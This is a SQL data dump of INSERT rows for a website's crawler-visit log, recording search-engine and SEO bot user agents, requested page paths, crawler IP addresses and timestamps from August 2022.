INSERT INTO `ey_weapp_spider_visit` VALUES ('94660', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/', '114.119.151.155', '1660400904', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94662', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/373.html', '114.119.151.155', '1660401211', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94661', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_11/', '114.119.151.153', '1660401037', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94676', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/101_4.html', '185.191.171.37', '1660404608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94674', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/462.html', '185.191.171.14', '1660403867', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94675', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/109.html', '185.191.171.37', '1660404606', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94685', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/454.html', '116.179.32.218', '1660410322', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94687', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/4_2.html', '220.181.108.113', '1660413595', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94657', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/35.html', '116.179.32.143', '1660400502', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94652', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_31/', '114.119.151.153', '1660399649', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94651', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/103.html', '114.119.151.153', '1660399511', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94677', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/368.html?admin_id=1', '114.119.151.155', '1660405327', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94649', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/453.html', '114.119.151.153', '1660398569', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94650', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yc.html', '114.119.151.153', '1660399380', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94644', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/356.html', '185.191.171.23', '1660396608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94643', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/438.html', '216.244.66.194', '1660395693', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94641', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/258.html', '66.249.79.108', '1660392620', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94648', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/243.html', '185.191.171.7', '1660398146', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94653', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/108.html', '114.119.151.155', '1660399769', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94811', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/310.html', '185.191.171.1', '1660481241', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94827', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/163.html', '185.191.171.17', '1660487375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94828', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/121.html', '114.119.151.153', '1660487605', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94812', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660481270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94813', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/414.html', '185.191.171.21', '1660481412', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94631', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1660386544', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94632', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/396.html', '185.191.171.10', '1660387531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94818', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/106.html', '220.181.108.159', '1660483608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94575', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/pjs.html', '114.119.151.155', '1660356121', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94576', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/345.html', '66.249.79.110', '1660356275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94819', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_15/', '116.179.32.48', '1660483609', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94572', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/388.html', '114.119.151.153', '1660355709', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94569', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/117.html', '17.121.112.12', '1660354973', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94564', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/shengyangshi.html', '114.119.151.155', '1660353459', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94565', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/124.html', '114.119.151.153', '1660354201', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94563', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/166.html', '114.119.151.155', '1660352608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94560', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/5.html', '185.191.171.7', '1660351175', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94558', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/about', '220.181.108.104', '1660348869', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94559', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/139.html', '116.179.32.31', '1660350925', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94555', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/products/13.html', '216.244.66.194', '1660347582', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94554', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_41/', '185.191.171.1', '1660347469', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94557', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_49.html', '185.191.171.19', '1660348228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94551', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.125', '1660346704', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94550', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/425.html', '185.191.171.33', '1660345667', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94566', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/383.html', '114.119.151.155', '1660354354', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94567', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/106.html', '114.119.151.153', '1660354648', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94570', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/20_4.html', '116.179.32.68', '1660355035', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94548', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/support/', '220.181.108.81', '1660344759', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94553', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/honor', '185.191.171.8', '1660347016', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94545', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.18', '1660343101', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94561', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/337.html', '185.191.171.10', '1660351209', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94568', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/blj/list_12_2/', '207.46.13.179', '1660354841', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94544', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/honor/25.html', '216.244.66.194', '1660342477', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94562', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/217.html', '185.191.171.8', '1660352326', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94518', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/415.html', '185.191.171.8', '1660323025', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94510', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/112.html', '185.191.171.21', '1660318530', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94504', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/66.html', '185.191.171.14', '1660315543', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94505', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/253.html', '114.119.151.155', '1660315588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94515', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/jiaruwomen/', '66.249.79.108', '1660321451', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94498', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xt.html', '114.119.151.155', '1660311649', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94500', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/list_4_3/', '114.119.151.153', '1660312620', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94491', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660304971', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94529', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/113.html', '185.191.171.35', '1660329070', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94531', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_41/', '185.191.171.15', '1660332317', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94534', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660333188', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94538', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/375.html', '185.191.171.3', '1660337119', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94488', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/347.html', '185.191.171.17', '1660304038', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94487', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_26/', '185.191.171.24', '1660303799', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94496', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_9.html', '185.191.171.36', '1660308733', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94490', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_20/', '185.191.171.15', '1660304856', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94520', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bbs.html', '114.119.151.155', '1660323372', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94489', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660304443', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94493', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660305821', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94492', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/257.html', '216.244.66.194', '1660305578', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94502', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/es.html', '114.119.151.153', '1660314230', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94516', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/57.html', '114.119.151.155', '1660322318', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94585', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/446.html', '216.244.66.194', '1660358747', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94586', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660359080', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94584', '6', 'mozilla/5.0 applewebkit/537.36 (khtml, like gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) chrome/103.0.5060.134 safari/537.36', '/news/165.html', '207.46.13.59', '1660358077', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94583', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.181', '1660358029', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94581', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/372.html', '66.249.79.108', '1660357289', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94579', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/blj/', '116.179.32.40', '1660357091', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94742', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.149', '1660444366', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94577', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/458.html', '114.119.151.153', '1660356368', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94556', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/362.html', '185.191.171.22', '1660347608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94807', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/171.html', '185.191.171.25', '1660479108', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94543', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_40/', '185.191.171.11', '1660342323', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94539', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.155', '1660337859', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94541', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44_3.html', '185.191.171.38', '1660340605', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94680', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/266.html', '185.191.171.39', '1660406585', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94664', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/422.html', '216.244.66.194', '1660401305', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94671', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/148_2.html', '185.191.171.8', '1660403170', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94672', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.110', '1660403378', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94593', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/462.html', '66.249.79.110', '1660361410', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94481', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_54/', '185.191.171.9', '1660301273', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94477', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660300425', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94479', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/258.html', '40.77.167.13', '1660301129', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94478', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/honor/', '220.181.108.159', '1660300425', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94480', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/131.html', '185.191.171.11', '1660301264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94485', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/289.html', '66.249.79.108', '1660303311', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94471', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/155.html', '185.191.171.10', '1660297597', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94472', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/64.html', '185.191.171.19', '1660297626', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94473', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_43/', '185.191.171.1', '1660298006', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94497', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/41_2.html', '220.181.108.178', '1660309063', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94469', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/products/335.html', '17.121.113.70', '1660296234', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94501', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98_9.html', '185.191.171.25', '1660313734', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94470', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/336.html', '157.55.39.41', '1660297232', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94467', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.117', '1660294444', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94512', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/89.html', '114.119.151.155', '1660318919', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94475', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/8.html', '185.191.171.19', '1660298763', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94463', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/99.html', '114.119.151.153', '1660288420', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94465', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_22/', '220.181.108.155', '1660290002', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94466', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.149', '1660291952', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94459', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_15/', '185.191.171.37', '1660287391', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94468', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/102.html', '185.191.171.14', '1660295049', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94508', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.105', '1660316680', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94722', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/102.html', '114.119.151.153', '1660431752', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94454', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/316.html', '114.119.151.153', '1660286394', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94474', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/289.html', '66.249.79.110', '1660298414', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94476', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/34.html', '66.249.79.112', '1660300021', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94451', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/gys.html', '114.119.151.153', '1660286096', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94452', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html', '/', '103.159.64.202', '1660286115', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94600', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/303.html', '185.191.171.41', '1660366898', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94606', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/43.html', '185.191.171.14', '1660369450', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94612', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/175.html', '116.179.32.69', '1660374406', '0');
